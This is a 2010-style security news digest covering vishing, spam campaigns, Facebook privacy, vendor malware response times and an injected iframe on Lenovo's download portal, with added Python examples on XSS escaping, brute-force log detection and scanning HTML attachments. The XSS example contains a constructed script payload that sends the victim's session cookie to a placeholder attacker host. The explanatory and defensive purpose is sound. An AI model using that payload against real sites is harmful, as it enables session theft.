A Spike in Phone Phishing Attacks?
A couple of readers have written in to say they recently received automated telephone calls warning them about fraud on their credit card accounts and directing them to call a phone number to "verify" their credit card numbers. These voice phishing attacks, sometimes called "vishing," are a good reminder that today's scam artists often abuse a range of modern technologies to perpetrate old-fashioned fraud.
Phone phishing schemes often begin with a pre-recorded message that prompts the recipient to call a supplied telephone number, frequently a toll-free line. Usually, the calls will be answered by a bogus interactive voice response system designed to coax account credentials and other personal information from the caller.
Lures for these telephone phishing attacks also are sent via text message, a variant also known as smishing. Indeed, the Sacramento Bee warned last week that residents in the area were receiving text messages spoofing the Yolo Federal Credit Union.
Continued here: http://krebsonsecurity.com/2010/06/a-spike-in-phone-phishing-attacks/
Double trouble - spam and malware payloads
Don't you hate spam? It's a nuisance, but not anything you really need to worry about, is it? I mean, it's not like you ran an executable, you just found yourself somewhere trying to sell you Viagra, no harm done, right? Wrong - one recent campaign in particular highlights this fact.
Graham's been talking about spam campaigns we've seen this last week containing HTML attachments. With topics currently covering Adult Friend Finder, romantic interest & Skype purchases, Facebook porn & Skype payment problems, and Facebook password resets, the spam's trying very hard to get you to open its attachment. And if you do, you get taken to a page from our old friends at Canadian Pharmacy: [...]
At which point you presumably close the window, and chalk up the experience as another annoying run-in with spam. Case closed, or is it?
When you open the attachment it loads a page from a remote website which looks something like this: [...]
Facebook Pushes Its Privacy Controls over Lingering Concerns
Facebook continued to push back against lingering concerns over its privacy controls, issuing a blog post and a letter detailing the ways in which it stewards users' personal data. Privacy advocates issued an open letter to Facebook CEO Mark Zuckerberg June 16, asking for more user control over information contained on the site. In response, Facebook issued a counter-letter addressing the advocates' concerns point-by-point, and followed that up with a corporate blog posting on June 18 detailing how its privacy settings worked. According to reports, the privately held company may have earned as much as $800 million in 2009.
This week saw Facebook push back against lingering concerns over how it uses member data, using resources such as its corporate blog to insist that individual privacy remains its utmost concern. While the social-networking site's revenues and membership have only increased over the past year, a rising chorus of privacy groups and individual users has questioned the controls over personal information.
On June 18, a posting on the Facebook blog described how the social-networking site attempts to give users control over that information. "We recently launched simplified privacy settings in response to feedback that certain Facebook settings had become too complicated," Monica Horak, an associate with the Facebook user operations team, wrote in a June 18 posting on the Facebook blog. "Facebook gives you two ways to [control] what information you share with applications and Websites."
It's Signed, therefore it's Clean, right?
From the F-Secure Weblog:
Security firms taking days to block malware
"Can you hold on till Friday?"
Anti-malware vendors can take up to 92.48 hours to block malicious sites, potentially leaving clients in blissful ignorance of threats to their systems in the meantime.
Security researchers NSS Labs reviewed a range of endpoint security products from ten big-name security vendors and their response to "socially engineered or consensual malware threats".
It said 15,000 to 50,000 such threats were presenting themselves per day.
Effectiveness rates varied from a 35 per cent block rate to a more comforting 88.3 per cent.
Vendors' average times to respond to new threats ranged from 4.62 hours to 92.48 hours, with the high end turned in by Panda, NSS Labs said. Of the 10 vendors profiled, just three managed response times of less than 30 hours.
Continued here: http://www.theregister.co.uk/2010/06/21/malware_delays/
GoogleCL: Command-line tool for Google services
Google has released a new utility that allows programmers and power users to access a variety of Google services using command line prompts. GoogleCL is an open source Python application that uses the Python gdata libraries (Google Data Python Client Library) to connect to the company's online services.
Supported Google services currently include, for example, Blogger, Calendar, Docs, Contacts, YouTube and the Picasa photo sharing site. Google has posted a number of Example Scripts that show how to create a new Blogger post, Calendar entry or Contact, and upload a video to YouTube. The developers note that, in addition to standard tarball and .deb package downloads, they "hope to have it included in Debian and Ubuntu repositories in time for their next releases."
Continued here: http://www.h-online.com/open/news/item/GoogleCL-Command-line-tool-for-Google-services-1025911.html
From the F-Secure Weblog:
When a company is hit with a cross-site scripting (XSS) attack, the natural reaction is to downplay the significance of the incident.
After all, an XSS vulnerability on a site does not mean that the site could be hacked or shut down. A typical XSS demonstration showing a funny dialog box on somebody else's site just emphasizes how harmless such an attack looks.
However, XSS is not harmless. We were just hit by one last night. And we do not want to downplay it.
The vulnerability on f-secure.com was found by security researcher Xylitol. He reported it yesterday evening. Xylitol is well-known for finding XSS vulnerabilities on sites such as army.mil, ibm.com and nasa.gov.
Continued here: http://www.f-secure.com/weblog/archives/00001972.html
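The point of the F-Secure post is that the alert() box in a typical XSS demo is the least interesting thing an injected script can do. The following is an added example, not code from the F-Secure post or from f-secure.com: one reflected injection point rendered twice, once without output encoding and once with contextual HTML escaping. The payload is constructed for the example and, instead of popping a dialog, ships the victim's session cookie to attacker.example (a placeholder host, assumed here). Python stands in for whatever server-side templating the real site uses; the two cases are the same in any language.

```python
import html

# Constructed attacker input (example only). The leading "> closes the value="..."
# attribute the input is reflected into; the script then sends document.cookie
# to attacker.example, a placeholder host for this example.
PAYLOAD = ('"><script>new Image().src="http://attacker.example/c?"'
           '+document.cookie</script>')


def render_search_unsafe(query):
    """Reflects the search term into the page with no encoding at all.
    This is the reflected-XSS shape: user input becomes page markup."""
    return (
        "<html><body>"
        f'<form><input name="q" value="{query}"></form>'
        f"<p>Results for {query}</p>"
        "</body></html>"
    )


def render_search_safe(query):
    """Same page with output encoding applied at the point of output.
    html.escape(quote=True) escapes & < > " and ', so the input can neither
    break out of the attribute value nor start a tag in the text node."""
    safe = html.escape(query, quote=True)
    return (
        "<html><body>"
        f'<form><input name="q" value="{safe}"></form>'
        f"<p>Results for {safe}</p>"
        "</body></html>"
    )


def contains_live_script(page):
    """Crude reviewer check over rendered output: is there a real <script
    tag where only user-supplied text was supposed to appear?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print("unsafe page carries live script:",
          contains_live_script(render_search_unsafe(PAYLOAD)))
    print("safe page carries live script:  ",
          contains_live_script(render_search_safe(PAYLOAD)))
    print(render_search_safe(PAYLOAD))
```

Note that encoding is context-specific: the same escaping that is correct inside an HTML attribute or text node is not sufficient inside a JavaScript string, a URL, or a CSS value, and an input reflected into several contexts needs the encoder that matches each one. An HttpOnly flag on the session cookie blunts this particular payload but does nothing against a script that drives the victim's browser directly.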
Spammers Target Facebook and Twitter at Once
From TrendLabs Malware Blog:
Due to their ever-growing popularity, social networks have been a continuous target of cybercriminals to proliferate their malicious schemes. TrendLabsSM received samples of another Facebook spam, this time also taking advantage of the popular micro-blogging site, Twitter. [...]
The mail, which poses as a Facebook notification message, uses adult-themed strings to lure users into opening the attachment. The .ZIP file attachment, Twitter.zip, contains the file twitter.html, which has an embedded malicious script that Trend Micro detects as JS_REDIR.AE.
Social networks are still on the verge of reaching their peak, as an increasing number of users spend more time on managing their accounts. According to the latest findings by Nielsen, social networking and blogging account for one in every four-and-a-half minutes people spend online.
With Facebook still remaining as one of the world's most popular social media sites and Twitter not far behind, cybercriminals will most likely use these sites more and more to propagate malicious codes.
Continued here: http://blog.trendmicro.com/spammers-target-facebook-and-twitter-at-once/
Network access control vendors pass endpoint security testing
"Alcatel-Lucent, Bradford, Enterasys, ForeScout, McAfee go above and beyond"
One of the main promises of network access control is that you can ensure that endpoint security tools are up to date and that non-compliant machines can be identified or blocked. As regulatory compliance has grown in importance, NAC vendors have reacted by building strong feature sets aimed at endpoint security and compliance. In our NAC testing, we had good, and sometimes great, results across the board when it came to endpoint security.
NAC: What went wrong?
We created a very basic endpoint security policy, and then checked to see whether we could implement that policy in our NAC products. We also looked at a variation on endpoint security: the ability of NAC products to handle system misbehavior. For example, if a typical, compliant desktop started trying to brute-force its way into other systems by guessing passwords, that would be misbehavior we'd want to detect. Whether the desktop is infected or the user is acting maliciously, it's still misbehavior, and NAC can help put a stop to it.
Continued here: http://www.networkworld.com/reviews/2010/062110-network-access-control-test-end-point.html
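The misbehavior case in the review, a compliant desktop that starts guessing passwords against its neighbours, is a detection problem before it is an enforcement problem. The following is an added example, not code from the Network World test or from any of the NAC products it covers: a sliding-window detector run over constructed sshd-style failure lines, flagging a source that racks up many failures across several hosts in a short span, and a decision function a NAC policy could hang off the result. The log lines, hosts and addresses are all made up for the example; the threshold, window and minimum-target values are assumptions a deployment would tune.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample log (not real data), in the shape a central syslog
# collector would see from sshd. 10.0.0.5 is the misbehaving desktop:
# six failures against five different hosts in five seconds.
# 10.0.0.9 is a user mistyping a password twice, minutes apart.
SAMPLE_LOG = """\
2010-06-21T10:00:01 host-a sshd[401]: Failed password for admin from 10.0.0.5 port 51022 ssh2
2010-06-21T10:00:02 host-a sshd[402]: Failed password for admin from 10.0.0.5 port 51023 ssh2
2010-06-21T10:00:03 host-b sshd[77]: Failed password for root from 10.0.0.5 port 51024 ssh2
2010-06-21T10:00:04 host-c sshd[912]: Failed password for backup from 10.0.0.5 port 51025 ssh2
2010-06-21T10:00:05 host-d sshd[13]: Failed password for admin from 10.0.0.5 port 51026 ssh2
2010-06-21T10:00:06 host-e sshd[55]: Failed password for admin from 10.0.0.5 port 51027 ssh2
2010-06-21T10:00:30 host-a sshd[403]: Failed password for alice from 10.0.0.9 port 40001 ssh2
2010-06-21T10:05:00 host-a sshd[404]: Failed password for alice from 10.0.0.9 port 40002 ssh2
2010-06-21T10:05:01 host-a sshd[405]: Accepted password for alice from 10.0.0.9 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\d+\.\d+\.\d+\.\d+)"
)


def parse_failures(log_text):
    """Yield (timestamp, source_ip, target_host, user) for each failed login."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield (datetime.fromisoformat(m.group("ts")),
                   m.group("src"), m.group("host"), m.group("user"))


def detect_bruteforce(log_text, threshold=5, window_seconds=60, min_targets=2):
    """Return {source_ip: {"failures": n, "targets": [...]}} for every source
    that produced at least `threshold` failures inside a `window_seconds`
    span against at least `min_targets` distinct hosts. The host-spread test
    separates network-wide password guessing from one user fumbling one box.
    Threshold, window and min_targets are assumed tuning values."""
    recent = defaultdict(deque)      # source_ip -> deque of (ts, target_host)
    flagged = {}
    for ts, src, host, _user in parse_failures(log_text):
        window = recent[src]
        window.append((ts, host))
        # drop events that have aged out of the window
        while window and (ts - window[0][0]).total_seconds() > window_seconds:
            window.popleft()
        targets = {h for _, h in window}
        if len(window) >= threshold and len(targets) >= min_targets:
            flagged[src] = {"failures": len(window), "targets": sorted(targets)}
    return flagged


def nac_decision(flagged, src):
    """What a post-admission NAC policy would do with the verdict: a flagged
    endpoint is moved to a quarantine VLAN, everything else keeps its access."""
    return "quarantine" if src in flagged else "allow"


if __name__ == "__main__":
    verdicts = detect_bruteforce(SAMPLE_LOG)
    for src in ("10.0.0.5", "10.0.0.9"):
        print(src, nac_decision(verdicts, src), verdicts.get(src))
```

The same logic applies to Windows 4625 events, RADIUS rejects or a switch's own port-security counters; what changes is the regular expression. The host-spread condition is the part worth keeping: a single source failing against many targets in seconds has no benign explanation, while the same count against one host often does.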
Opera 10.54 closes critical security holes
Norwegian vendor Opera has released version 10.54 of its browser to close four security holes, one of which the company rates as extremely severe and another as highly severe. To protect users until the majority have updated to the new version, the company plans to release details of the flaws only at a later date. Opera advises all users to update to the latest release as soon as possible.
The Mac version fixes numerous other minor bugs and instabilities, and now automatically uninstalls the old version during auto-updates. Last week, Opera released version 10.6 beta for Windows, Mac OS X, and Unix; this version is considerably faster and prettier than its predecessor.
Continued here: http://www.h-online.com/security/news/item/Opera-10-54-closes-critical-security-holes-1026360.html
See Vulnerabilities & Fixes: Opera Multiple Unspecified Vulnerabilities
Mobile malware is a reality says Kaspersky
Mobile malware has been bubbling along in the background of the security world for the last few years, but according to Denis Maslennikov, Kaspersky Lab's mobile research group manager, the rise in smartphone sales is triggering a surge in mobile malware development among cybercriminals.
Speaking at Kaspersky Lab's recent analyst summit, Maslennikov said that the first piece of mobile malware using the internet dates back to 2004, when a Ukrainian hacker developed the code.
Cybercriminals, he said, then lost interest in these types of programmes until quite recently; today 35% of all detected smartphone malware is tracked as operating via the internet.
Continued here: http://www.infosecurity-us.com/view/10407/mobile-malware-is-a-reality-says-kaspersky-/
Update: Apple launches iOS 4 upgrade
"The iPhone OS update became available just after 1 p.m. ET"
Apple will release the iOS 4 update today around 1 p.m. ET, 10 a.m. PT, according to claims from users citing calls to the company's sales and support desks.
As of 11:45 a.m. ET, the update, which Apple said earlier this month would be delivered today, was not yet available via iTunes. Apple updated iTunes to version 9.2 last week to make the software compatible with the new mobile OS.
Several iPhone owners on Apple's support forum claimed that they had been told by Apple support personnel that the iOS 4 update would launch at 10 a.m. PT. Apple is headquartered in Cupertino, Calif., in the Pacific Time zone.
Computerworld was not able to confirm the reported launch time; Apple's telephone lines were swamped with calls, with wait times that exceeded 30 minutes.
Continued here: http://www.computerworld.com/s/article/9178352/Update_Apple_launches_iOS_4_upgrade
Also: Apple iPhone iOS 4 Arrives: 10 Reasons to Upgrade
Malicious code on Lenovo driver download page - Update
The driver download portal of hardware manufacturer Lenovo temporarily served malicious code. Various virus scanners issued alerts about a Java-based Trojan downloader or dropper. The iframe injected by the attackers points to the volgo-marun.cn server and can still be found on several pages of the download.lenovo.com server.
However, the injected links to the Chinese server now point to a non-existent target, so there is no longer an immediate threat. The Firefox and Chrome web browsers have also started to warn their users about accessing this server. Since Lenovo doesn't appear to have responded, the security hole may still be open, which would allow attackers to deploy updated iframe links on the download pages at any time.
Continued (with update) here: http://www.h-online.com/security/news/item/Malicious-code-on-Lenovo-driver-download-page-Update-1025886.html
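Three items on this page are the same mechanism seen from different angles: the HTML attachments in the Canadian Pharmacy spam, the twitter.html inside Twitter.zip that Trend Micro detects as JS_REDIR.AE, and the iframe injected into download.lenovo.com pages. In each case an HTML document the victim is handed does nothing itself except pull in or jump to content on a host that is not the one it claims to be from. The following is an added example, not code from Sophos, Trend Micro, heise or Lenovo: a scanner that unpacks a zip attachment or takes a page as served, lists every remote load or redirect it contains, and reports the hosts that differ from the page's legitimate origin. The two sample documents are constructed for the example; pharmacy.example and injected.example are placeholder hosts, not the real ones.

```python
import io
import re
import zipfile
from html.parser import HTMLParser
from urllib.parse import urlparse


class RemoteContentFinder(HTMLParser):
    """Records the ways a page can pull in or jump to content elsewhere:
    <iframe>/<frame>/<script src=...>, <meta http-equiv="refresh">, and
    inline script that assigns window/document/top.location."""

    def __init__(self):
        super().__init__()
        self.remote = []            # list of (kind, url)
        self.inline_redirect = False
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("iframe", "frame", "script") and a.get("src"):
            self.remote.append((tag, a["src"]))
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"\s]+)", a.get("content") or "", re.I)
            if m:
                self.remote.append(("meta-refresh", m.group(1)))
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # script bodies arrive here as raw text
        if self._in_script and re.search(r"\b(window|document|top)\.location\b", data):
            self.inline_redirect = True


def scan_html(data, page_host=""):
    """Scan one HTML document. page_host is the host the page is legitimately
    served from; anything loaded from a different host is reported as external.
    For a mail attachment there is no legitimate host, so every host is external."""
    parser = RemoteContentFinder()
    parser.feed(data.decode("utf-8", "replace"))
    parser.close()
    external = set()
    for _kind, url in parser.remote:
        host = (urlparse(url).hostname or "").lower()
        if host and host != page_host.lower():
            external.add(host)
    return {
        "remote": parser.remote,
        "external_hosts": sorted(external),
        "inline_redirect": parser.inline_redirect,
    }


def scan_attachment(filename, data):
    """Scan a mail attachment: bare .htm/.html files directly, .zip archives
    member by member (the Twitter.zip case). Returns {member_name: findings}."""
    results = {}
    name = filename.lower()
    if name.endswith(".zip"):
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            for member in z.namelist():
                if member.lower().endswith((".htm", ".html")):
                    results[member] = scan_html(z.read(member))
    elif name.endswith((".htm", ".html")):
        results[filename] = scan_html(data)
    return results


def build_zip(members):
    """Build an in-memory zip from {name: bytes} so the example runs offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for member, content in members.items():
            z.writestr(member, content)
    return buf.getvalue()


# Constructed samples, not the real Twitter.zip or the real Lenovo pages.
# pharmacy.example and injected.example are placeholder hosts.
ATTACHMENT_HTML = b"""<html><head>
<meta http-equiv="refresh" content="0; url=http://pharmacy.example/?aff=1">
</head><body>
<script>window.location = "http://pharmacy.example/?aff=1";</script>
</body></html>"""

INJECTED_PAGE = b"""<html><body><h1>Driver downloads</h1>
<iframe src="http://injected.example/in.cgi?3" width="0" height="0" style="display:none"></iframe>
<script src="/js/site.js"></script>
</body></html>"""

if __name__ == "__main__":
    print(scan_attachment("Twitter.zip", build_zip({"twitter.html": ATTACHMENT_HTML})))
    print(scan_html(INJECTED_PAGE, page_host="download.lenovo.com"))
```

Run against a site's own pages on a schedule, the `external_hosts` list doubles as a cheap integrity check: a driver download page that suddenly starts loading a frame from a host the site has never referenced is exactly the Lenovo symptom, and it shows up whether or not any scanner yet knows the payload behind it. The scanner does not follow the links it finds, which is deliberate; fetching a redirector's target from an analysis box is a separate decision.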
30 states may join probe of Google Wi-Fi snoop
"'As many questions as answers'"
As many as 30 states may investigate Google for surreptitiously sniffing traffic traveling over open Wi-Fi networks over a three-year span, Connecticut's top law-enforcement official said on Monday.
Connecticut Attorney General Richard Blumenthal said his office will lead the multi-state investigation into the unauthorized data collection by Google Street View cars. A "significant number of states" are expected to participate, according to a press release issued by his office that claimed representatives from more than 30 states joined a recent telephone conference call to discuss the probe.
"While we hope Google will continue to cooperate, its response so far raises as many questions as it answers," Blumenthal said in the release. "The company must provide a complete and comprehensive explanation of how this unauthorized data collection happened, why the information was kept if collection was inadvertent and what action will prevent a recurrence."
Continued here: http://www.theregister.co.uk/2010/06/21/google_wifi_snoop_inquiries/
Report IDs domain name registrars who sponsor illegal activity
From the Sunbelt Blog:
Anti-spam group KnujOn ("NoJunk" backwards), a member of the Internet Corporation for Assigned Names and Numbers (ICANN), has issued a nearly 100-page report detailing how some domain name registrars are actively shielding pharma and other illegal groups by protecting their web sites from takedown. The report (PDF) names names.
ICANN is responsible for managing the assignment of domain names and IP addresses on behalf of the U.S. government.
KnujOn's report quotes John Horton, President of LegitScript.com: "The Internet rule is straightforward. Domain name registrars are required by ICANN to prohibit domain owners from using their domains for unlawful purposes. Without exception, this rule is also reflected in each registrar's terms and conditions, thus formalizing and protecting the company's contractual right to suspend domain names for unlawful activity. Once a registrar becomes aware that a website is engaged in criminal activity, the company has the legal authority and technical ability to suspend the domain name, rendering the illegal and fraudulent content inaccessible. This self-policing is meant to balance freedom of speech with safety and legitimacy as the Internet continues to evolve. But all too often, registrars simply turn a blind eye to criminal activity."
Continued here: http://sunbeltblog.blogspot.com/2010/06/report-ids-domain-name-registrars-who.html
Scam Alert: GoDaddy "Order Confirmation" email is a Scam
I just received one of these e-mails myself, so I checked it out because I have not ordered anything from GoDaddy.
Quoted from Denise Richardson, June 21, 2010 5:01 PM:
Quick scam alert...DO NOT FALL FOR the latest email scam circulating. It arrives as an order confirmation from Go-Daddy and though it appears to look very authentic -it's anything but that. The email includes Go-Daddy's official phone number and logo and it also includes a few infected links that the scammers hope you will click on. When clicked on you will undoubtedly download malicious spyware onto your computer.
The phony order confirmation comes as a receipt for $357.00 worth of bulk domain names you recently purchased and allows you to click on links and pictures in the email for additional info.
Do not click on any links or pictures.
Go-daddy has been flooded with calls on this scam - and it's easy to see why. The email looks very legit.
If you received this email, delete it immediately.
If you received it and already clicked on the links - update your virus protection, run a full scan on your computer and dump all data you may have in your cache.